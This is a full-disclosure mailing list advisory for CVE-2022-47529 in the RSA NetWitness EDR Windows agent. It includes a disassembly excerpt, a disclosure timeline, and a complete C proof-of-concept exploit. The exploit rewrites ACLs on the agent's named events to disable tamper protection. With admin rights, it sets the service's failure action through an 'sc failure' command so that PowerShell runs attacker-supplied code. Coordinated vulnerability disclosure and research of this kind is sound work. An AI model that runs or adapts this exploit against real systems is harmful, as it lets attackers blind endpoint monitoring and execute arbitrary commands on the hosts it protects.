[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] RSA NetWitness Platform EDR / Incorrect Access Control - Code Execution
From: hyp3rlinx <apparitionsec () gmail ! com>
Date: 2023-03-27 20:42:20
Message-ID: CAFD2FDM1mjdxRotATddh8EFR0_yCFcfKyiZcFTn7YepQT06x-w () mail ! gmail ! com
[Download RAW message or body]
["RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt" (text/plain)]
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
RSA Security
www.netwitness.com
[Product]
NetWitness Endpoint EDR Agent
The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your \
endpoints—on and off the network—providing deep visibility into their security state, and \
it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell \
time by rapidly detecting new and non-malware attacks that other EDR solutions miss, and it \
cuts the cost, time and scope of incident response.
[Vulnerability Type]
Incorrect Access Control / Code Execution
[CVE Reference]
CVE-2022-47529
[Security Issue]
CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to \
SIEM or make the agent run user-supplied commands.
Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through \
12.x allow local and admin Windows user accounts to modify the endpoint agent service \
configuration: to either disable it completely or run user-supplied code or commands, thereby \
bypassing tamper-protection features via ACL modification.
Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before \
finding and report.
SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d
LANDeskService.exe
[Severity]
Critical
[Impact(s)]
Denial-of-Service
Arbitrary Code Execution
[Attack Vector]
To exploit, open handle to memory objects held by the endpoint agent,
modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group
[Affected Product Code Base]
All versions prior to v12.2
[Network Access]
Local
[References]
https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935
[Vuln Code Block]:
00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:00000001400F7B10 ; sub_14013BA50+19?p
.text:00000001400F7B10 ; DATA XREF: ...
.text:00000001400F7B10 push rbx
.text:00000001400F7B12 sub rsp, 20h
.text:00000001400F7B16 mov rbx, rcx
.text:00000001400F7B19 test rcx, rcx
.text:00000001400F7B1C jz short loc_1400F7B5C
.text:00000001400F7B1E call cs:InitializeCriticalSection
.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection
.text:00000001400F7B28 call cs:InitializeCriticalSection
.text:00000001400F7B2E mov edx, 1 ; bManualReset
.text:00000001400F7B33 xor r9d, r9d ; lpName
.text:00000001400F7B36 mov r8d, edx ; bInitialState
.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes
.text:00000001400F7B3B call cs:CreateEventW
.text:00000001400F7B41 mov [rbx+50h], rax
.text:00000001400F7B45 mov dword ptr [rbx+58h], 0
.text:00000001400F7B4C test rax, rax
.text:00000001400F7B4F jz short loc_1400F7B5C
[Exploit/POC]
"RSA_NetWitness_Exploit.c"
#include "windows.h"
#include "stdio.h"
#include "accctrl.h"
#include "aclapi.h"
#define OPEN_ALL_ACCESS 0x1F0003
/*
RSA NetWitness EDR Endpoint Agent
Tamper Protection Bypass / EoP Code Execution
RSA NetWitness.msi --> NWEAgent.exe
MD5: c0aa7e52cbf7799161bac9ebefa38d49
Expected result: Low privileged standard users are prevented from interfering with and or \
modifying events for the RSA Endpoint Agent. Actual result: RSA NetWitness Endpoint Agent is \
terminated by a low privileged standard non-administrator user.
By John Page (hyp3rlinx) - Nov 2022
DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever \
from testing, modifying and or misuse. Users of this supplied PoC code accept all risks, do no \
harm.
X64 PE file vuln code block:
00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:00000001400F7B10 ; sub_14013BA50+19?p
.text:00000001400F7B10 ; DATA XREF: ...
.text:00000001400F7B10 push rbx
.text:00000001400F7B12 sub rsp, 20h
.text:00000001400F7B16 mov rbx, rcx
.text:00000001400F7B19 test rcx, rcx
.text:00000001400F7B1C jz short loc_1400F7B5C
.text:00000001400F7B1E call cs:InitializeCriticalSection
.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection
.text:00000001400F7B28 call cs:InitializeCriticalSection
.text:00000001400F7B2E mov edx, 1 ; bManualReset
.text:00000001400F7B33 xor r9d, r9d ; lpName
.text:00000001400F7B36 mov r8d, edx ; bInitialState
.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes
.text:00000001400F7B3B call cs:CreateEventW
.text:00000001400F7B41 mov [rbx+50h], rax
.text:00000001400F7B45 mov dword ptr [rbx+58h], 0
.text:00000001400F7B4C test rax, rax
.text:00000001400F7B4F jz short loc_1400F7B5C
1) Install "RSA NetWitness.msi" (Endpoint EDR Agent)
2) Run Exploit PoC as a Standard non-admin user, the PoC will:
a) Open a handle (copy) to Ecat002 event.
b) Open additional handles for events Ecat004 and Ecat002, modifying them to deny access to \
Everyone group. c) Set/Reset event the Ecat002 handle.
d) if admin privs change the EDR service configuration
Non vulnerable agents will output "Not vulnerable to the console", customers can modify and \
use test to see if vuln.
*/
char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"};
BOOL PWNED=FALSE;
void Exploit();
int AdminChl();
void HijackSvcConfig();
int main(void){
printf("[+] RSA NetWitness EDR Agent 0Day\n");
printf("[+] CVE-2022-47529\n");
printf("[+] Discovery: John Page (aka hyp3rlinx)\n");
printf("[+] ===================================\n");
Exploit();
if( AdminChk() ){
printf("[+] Hijacked NetWitness Agent Service!\n");
HijackSvcConfig();
}
Sleep(2000);
printf("[+] Done!\n\n");
system("pause");
return 0;
}
void Exploit(){
PACL pOldDACL = NULL;
PACL pNewDACL = NULL;
HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)"Global\\Ecat002");
int i=0;
for(; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){
HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]);
if(hEvent != INVALID_HANDLE_VALUE){
printf("[-] Targeting Event: %s\n", Vuln_Events[i]);
Sleep(500);
if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, \
&pOldDACL, NULL, NULL) == ERROR_SUCCESS){ TRUSTEE trustee[1];
trustee[0].TrusteeForm = TRUSTEE_IS_NAME;
trustee[0].TrusteeType = TRUSTEE_IS_GROUP;
trustee[0].ptstrName = TEXT("Everyone");
trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
trustee[0].pMultipleTrustee = NULL;
EXPLICIT_ACCESS explicit_access_list[1];
ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));
explicit_access_list[0].grfAccessMode = DENY_ACCESS;
explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;
explicit_access_list[0].grfInheritance = NO_INHERITANCE;
explicit_access_list[0].Trustee = trustee[0];
if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){
printf("%s%d", "[!] Not vulnerable! ", GetLastError());
}
if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, \
pNewDACL, NULL) != ERROR_SUCCESS){ printf("%s%d", "[!] Not vulnerable! ", \
GetLastError()); }else{
SetEvent(hEvent_Ecat002);
Sleep(1000);
ResetEvent(hEvent_Ecat002);
CloseHandle(hEvent_Ecat002);
SetEvent(hEvent);
Sleep(1000);
PWNED=TRUE;
}
if(PWNED){
LocalFree(pNewDACL);
LocalFree(pOldDACL);
CloseHandle(hEvent);
}
Sleep(1000);
}
}
}
}
//If run as admin, modify the agent service config to run our own code.
int AdminChk(){
int result = 0;
HANDLE hToken = NULL;
if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY,&hToken)){
TOKEN_ELEVATION elevated;
DWORD tokSize = sizeof(TOKEN_ELEVATION);
if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){
result = elevated.TokenIsElevated;
}
}
if(hToken){
CloseHandle(hToken);
}
return result;
}
//Trivial example modify the service config...
void HijackSvcConfig(){
Sleep(1000);
WinExec("sc failure NWEAgent command= \
""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Evil-Command-Here""", 0); }
[POC Video URL]
https://www.youtube.com/watch?v=kO1fu4IOlSs
[Disclosure Timeline]
Vendor Notification: December 2, 2022
CVE assigned: December 19, 2022
Hotfix v12.1.0.1: January 3, 2023
Fixed in v12.2.0.0 January 4, 2023
Restested for vendor: January 6, 2023
March 24, 2023 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or \
guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution \
of this advisory, provided that it is not altered except by reformatting it, and that due \
credit is given. Permission is explicitly given for insertion in vulnerability databases and \
similar, provided that due credit is given to the author. The author is not responsible for any \
misuse of the information contained herein and accepts no responsibility for any damage caused \
by the use or misuse of this information. The author prohibits any malicious use of security \
related information or exploits by the author or elsewhere. All content (c).
hyp3rlinx
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic